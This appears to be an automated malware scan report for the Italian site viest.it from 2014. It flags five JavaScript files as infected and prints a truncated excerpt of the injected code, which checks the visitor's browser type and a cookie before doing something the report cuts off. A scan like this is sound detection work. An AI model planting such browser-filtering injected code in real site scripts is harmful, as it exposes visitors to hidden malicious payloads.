Scanned pages/files
Request | Server response | Status |
http://viest.it/ | 200 OK Content-Length: 40895 Content-Type: text/html | clean |
http://viest.it/js/modernizr.foundation.js | 200 OK Content-Length: 10336 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged script; the report cuts it off mid-statement, marked [...] here:
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight [...]
Antivirus reports:
| ||
http://www.simplebooking.it/search-box-script.axd?IDA=1819 | 200 OK Content-Length: 66080 Content-Type: text/javascript | clean |
http://viest.it/js/jquery.js | 200 OK Content-Length: 266266 Content-Type: application/javascript | clean |
http://viest.it/js/foundation.min.js | 200 OK Content-Length: 160076 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged script; the report cuts it off mid-statement, marked [...] here:
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight [...]
Antivirus reports:
| ||
http://viest.it/js/tinynav.min.js | 200 OK Content-Length: 1881 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged script; the report cuts it off mid-statement, marked [...] here:
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight [...]
Remainder shown by the report (apparently the end of the file's original content):
b.header||e.find(":eq("+a(f+" li").index(a(f+" li."+b.active))+")").attr("selected",!0);e.change(function(){i.location.href=a(this).val()});a(f).after(e);b.label&&e.before(a("<label/>").attr("for",d).addClass("tinynav_label "+d+"_label").append(b.label))}})}})(jQuery,this,0);
Antivirus reports:
| ||
http://viest.it/js/light.js | 200 OK Content-Length: 7302 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged script; the report cuts it off mid-statement, marked [...] here:
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight [...]
Antivirus reports:
| ||
http://viest.it/js/app.js | 200 OK Content-Length: 5471 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged script; the report cuts it off mid-statement, marked [...] here:
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight [...]
Remainder shown by the report (apparently the end of the file's original content):
} var widthGap = (myWidth > myParentWidth) ? (myWidth - myParentWidth)/2 : (myParentWidth - myWidth)/2; var heightGap = (myHeight > myParentHeight) ? (myHeight - myParentHeight)/2 : (myParentHeight - myHeight)/2; me.css({ 'margin-top' : -heightGap, 'margin-left': -widthGap }); } } })(jQuery, this);
Antivirus reports:
| ||
http://www.jscache.com/wejs?wtype=certificateOfExcellence&uniq=660&locationId=202587&lang=it&year=2013 | 200 OK Content-Length: 152 Content-Type: application/x-javascript | clean |
http://viest.it/home | 200 OK Content-Length: 40883 Content-Type: text/html | clean |
http://viest.it/camping-vicenza | 200 OK Content-Length: 41560 Content-Type: text/html | clean |
http://viest.it/vicenza_e_dintorni | 200 OK Content-Length: 36244 Content-Type: text/html | clean |
http://viest.it/contatti | 200 OK Content-Length: 43024 Content-Type: text/html | clean |
http://viest.it/dove_siamo | 200 OK Content-Length: 37372 Content-Type: text/html | clean |
http://viest.it/guestbook | 200 OK Content-Length: 37361 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: viest.it
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:05:30 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6h66l7k27devm16bos2sb8h866; path=/
GET / HTTP/1.1
Host: viest.it
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:05:30 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6h66l7k27devm16bos2sb8h866; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: viest.it
Referer: http://www.google.com/search?q=viest.it
Result:
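The result is similar to the first query. There are no suspicious redirects found. Note that this check compares HTTP responses only: the flagged script excerpt in the file list branches on navigator.userAgent and a cookie inside the browser, so behaviour of that kind would not necessarily show up in a header-level comparison.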
GET / HTTP/1.1
Host: viest.it
Referer: http://www.google.com/search?q=viest.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=viest.it
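Result: This site is not currently listed as suspicious. (Blacklist status is independent of the file scan above, which marked five scripts under /js/ as malicious; an unlisted site is not evidence that those files are clean.)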
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://viest.it/
Result: viest.it is not infected or malware details are not published yet.
Result: viest.it is not infected or malware details are not published yet.